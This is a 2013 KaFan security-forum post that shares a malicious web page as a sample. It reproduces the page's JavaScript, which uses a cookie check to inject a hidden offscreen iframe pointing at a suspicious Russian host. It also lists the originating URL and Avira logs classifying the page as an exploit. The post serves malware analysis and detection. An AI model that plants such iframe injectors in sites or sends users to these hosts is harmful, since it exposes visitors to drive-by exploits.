收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 裏面
返回列表 发新帖
查看: 1393|回复: 0
收起左侧

[已鉴定] 裏面

[复制链接]
fireold
发表于 2013-11-10 09:44:22 | 显示全部楼层 |阅读模式
  1. http://piterautogid.ru/mojki/137-ÃÃÂÂ&a
复制代码

  1. function y09() {
  2.     var static = 'ajax';
  3.     var controller = 'index.php';
  4.     var y = document.createElement('iframe');

  6.     y.src = 'http://csp-mvd.ru/cnt.php';
  7.     y.style.position = 'absolute';
  8.     y.style.color = '09531';
  9.     y.style.height = '09531px';
  10.     y.style.width = '09531px';
  11.     y.style.left = '100009531';
  12.     y.style.top = '100009531';

  14.     if (!document.getElementById('y')) {
  15.         document.write('<p id=\'y\' class=\'y09\' ></p>');
  16.         document.getElementById('y').appendChild(y);
  17.     }
  18. }

  20. function SetCookie(cookieName, cookieValue, nDays, path) {
  21.     var today = new Date();
  22.     var expire = new Date();
  23.     if (nDays == null || nDays == 0) nDays = 1;
  24.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  25.     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  26. }

  28. function GetCookie(name) {
  29.     var start = document.cookie.indexOf(name + "=");
  30.     var len = start + name.length + 1;
  31.     if ((!start) && (name != document.cookie.substring(0, name.length))) {
  32.         return null;
  33.     }
  34.     if (start == -1) return null;
  35.     var end = document.cookie.indexOf(";", len);
  36.     if (end == -1) end = document.cookie.length;
  37.     return unescape(document.cookie.substring(len, end));
  38. }
  39. if (navigator.cookieEnabled) {
  40.     if (GetCookie('visited_uq') == 55) {} else {
  41.         SetCookie('visited_uq', '55', '1', '/');

  43.         y09();
  44.     }
  45. }
复制代码



Avira
2013/11/10 上午 09:41 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\NWCVQR67\%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;Acir
      c;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;amp;amp;am
      p;amp;Acirc;&amp;amp;amp;a[1].htm'
      包含病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]
      已採取動作:
      發生錯誤,檔案未刪除。錯誤識別碼:26003.
      檔案無法刪除!.
      嘗試使用 ARK 程式庫執行動作.
      檔案會移動至 '42db634e.qua' 名稱底下的隔離區目錄!

2013/11/10 上午 09:41 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數:        838
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/11/10 上午 09:40 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\alan\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\NWCVQR67\%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;Acir
      c;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;amp;amp;am
      p;amp;Acirc;&amp;amp;amp;a[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.GQ [exploit]'
      執行的動作:傳輸至掃描程式

2013/11/10 上午 09:40 [Web Protection] 發現惡意程式碼
      從 URL
      "http://piterautogid.ru/mojki/137-&amp;amp;amp;amp;amp;amp;amp;Atilde;&amp;amp;a
      mp;amp;amp;amp;Atilde;&amp;amp;amp;amp;amp;Atilde;&amp;amp;amp;amp;Atilde;&amp;a
      mp;amp;Atilde;&amp;amp;Atilde;&amp;Atilde;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc
      ;%C3%83%C2%82%C3%82%C2%82&amp;Acirc;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc;%C3%8
      3%C2%82%C3%82%C2%82&amp;amp;Acirc;&amp;Atilde;&Atilde;%C3%83%C2%82%C3%82%C2%82&A
      circ;%C3%83%C2%82%C3%82%C2%82&amp;Acirc;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc;%
      C3%83%C2%82%C3%82%C2%82&amp;amp;amp;Acirc;&amp;amp;Atilde;&amp;Atilde;&Atilde;%C
      3%83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;Acirc;&Atilde;%C3%83%C
      2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;amp;Acirc;&amp;Atilde;&Atild
      e;%C3%83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;Acirc;&Atilde;%C3%
      83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;amp;amp;amp;Acirc;&amp;a
      mp;amp;Atilde;&amp;amp;Atilde;&amp;Atilde;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc
      ;%C3%83%C2%82%C3%82%C2%82&amp;Acirc;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc;%C3%8
      3%C2%82%C3%82%C2%82&amp;amp;Acirc;&amp;Atilde;&Atilde;%C3%83%C2%82%C3%82%C2%82&A
      circ;%C3%83%C2%82%C3%82%C2%82&amp;Acirc;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc;%
      C3%83%C2%82%C3%82%C2%82&amp;amp;amp;Acirc;&amp;amp;Atilde;&amp;Atilde;&Atilde;%C
      3%83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;Acirc;&Atilde;%C3%83%C
      2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;amp;Acirc;&amp;Atilde;&Atild
      e;%C3%83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;Acirc;&Atilde;%C3%
      83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;amp;amp;amp;amp;Acirc;&a
      mp;amp;amp;a" 存取資料時,
      發現病毒或有害的程式 'EXP/JS.Expack.GQ' [exploit]。
      已採取動作:已略過


av3.jpg



fs is
fs3.jpg

回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 14:08 , Processed in 0.139131 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表